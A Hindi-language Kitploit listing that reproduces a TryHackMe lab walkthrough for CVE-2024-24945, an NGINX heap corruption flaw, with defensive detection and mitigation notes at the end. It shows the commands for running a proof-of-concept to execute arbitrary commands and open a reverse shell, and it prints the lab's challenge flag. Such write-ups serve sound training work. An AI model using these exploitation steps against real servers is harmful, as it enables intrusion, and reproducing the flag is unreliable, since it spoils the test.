Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough — यह लैब CVE-2024-24945 के शोषण को प्रदर्शित करता है, जो NGINX को प्रभावित करने वाली एक heap corruption (हीप भ्रष्टाचार) भेद्यता है। उद्देश्य यह समझना था कि मेमोरी भ्रष्टाचार किस प्रकार Remote Code Execution (RCE) की ओर ले जा सकता है, तथा शोषण, पहचान और शमन तकनीकों में व्यावहारिक अनुभव प्राप्त करना था। | Kitploit
उपकरण/GitHubGitHub/benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाबाइनरी शोषणलैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

GitHub
benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough

CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

यह लैब CVE-2024-24945 के शोषण को प्रदर्शित करता है, जो NGINX को प्रभावित करने वाली एक heap corruption (हीप भ्रष्टाचार) भेद्यता है। उद्देश्य यह समझना था कि मेमोरी भ्रष्टाचार किस प्रकार Remote Code Execution (RCE) की ओर ले जा सकता है, तथा शोषण, पहचान और शमन तकनीकों में व्यावहारिक अनुभव प्राप्त करना था।

साझा करें

CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough

यह लैब CVE-2024-24945 के शोषण को प्रदर्शित करता है, जो NGINX को प्रभावित करने वाली एक हीप भ्रष्टाचार भेद्यता है। उद्देश्य यह समझना था कि मेमोरी भ्रष्टाचार कैसे रिमोट कोड निष्पादन (RCE) की ओर ले जा सकता है और शोषण, पहचान और शमन तकनीकों में व्यावहारिक अनुभव प्राप्त करना।

उद्देश्य

. कमजोर NGINX सेवा की पुष्टि करें। . प्रदान किए गए प्रूफ ऑफ कॉन्सेप्ट (PoC) का उपयोग करके मनमानी कमांड निष्पादित करें। . लक्ष्य कंटेनर पर रिवर्स शेल प्राप्त करें। . चैलेंज फ्लैग प्राप्त करें। . पहचान और शमन रणनीतियों को समझें।

लैब वातावरण

. प्लेटफॉर्म: TryHackMe . लक्ष्य सेवा: NGINX RIFT . कंटेनरीकृत वातावरण: Docker . शोषण उपकरण: poc.py . पहुँच विधि: VNC (वर्चुअल नेटवर्क कंप्यूटिंग)

पद्धति

  1. सेवा सत्यापन

  2. पुष्टि की गई कि कमजोर कंटेनर चल रहा था और सुलभ था।

  3. root@kitploit:~
    sudo docker ps
    curl -s http://127.0.0.1:19321/api/users/42
    

बैकएंड ठीक है

  1. रिमोट कोड निष्पादन

मनमानी कमांड निष्पादन को मान्य करने के लिए प्रदान किए गए PoC को निष्पादित किया।

root@kitploit:~
python3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned'

सफल निष्पादन की पुष्टि की गई:

root@kitploit:~
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned

आउटपुट: hello from depthfirst

रिवर्स शेल एक्सेस

लक्ष्य कंटेनर पर एक इंटरैक्टिव शेल स्थापित करें।

root@kitploit:~
python3 poc.py --shell

सफल कनेक्शन:

[] पोर्ट 1337 पर रिवर्स शेल सुन रहा है... [] कनेक्टेड। $

  1. फ्लैग प्राप्ति

चैलेंज फ्लैग तक पहुँचा गया।

root@kitploit:~
cat /flag.txt

फ्लैग:

THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}

पहचान के अवसर

रक्षक शोषण प्रयासों की पहचान कर सकते हैं:

. NGINX वर्कर क्रैश . सेगमेंटेशन फॉल्ट घटनाएँ . अप्रत्याशित आउटबाउंड नेटवर्क कनेक्शन . संदिग्ध शेल प्रक्रियाएँ (/bin/sh, bash) . अस्थायी निर्देशिकाओं में अनधिकृत फ़ाइल निर्माण

शमन रणनीतियाँ

. पैच किए गए NGINX संस्करण में अपग्रेड करें। . न्यूनतम विशेषाधिकार के सिद्धांत को लागू करें। . अनावश्यक आउटबाउंड नेटवर्क ट्रैफ़िक को प्रतिबंधित करें। . निरंतर लॉग निगरानी लागू करें। . कंटेनर सुरक्षा नियंत्रण और रनटाइम निगरानी का उपयोग करें।

मुख्य निष्कर्ष

इस लैब ने निम्न में व्यावहारिक अनुभव प्रदान किया:

. हीप भ्रष्टाचार भेद्यताओं को समझना। . रिमोट कोड निष्पादन दोषों का शोषण करना। . रिवर्स शेल स्थापित करना। . शोषण के बाद सत्यापन करना। . समझौता संकेतकों और शमन तकनीकों को पहचानना।

अस्वीकरण

यह अभ्यास केवल शैक्षिक और रक्षात्मक साइबर सुरक्षा प्रशिक्षण उद्देश्यों के लिए एक नियंत्रित TryHackMe लैब वातावरण में किया गया था।

लेखक: [Benedict Ejepu Amaechi] प्लेटफॉर्म: TryHackMe विषय: CVE-2024-24945 (NGINX RIFT) शोषण और रक्षा पूर्णता तिथि: जून 2026

टूल डाउनलोड करें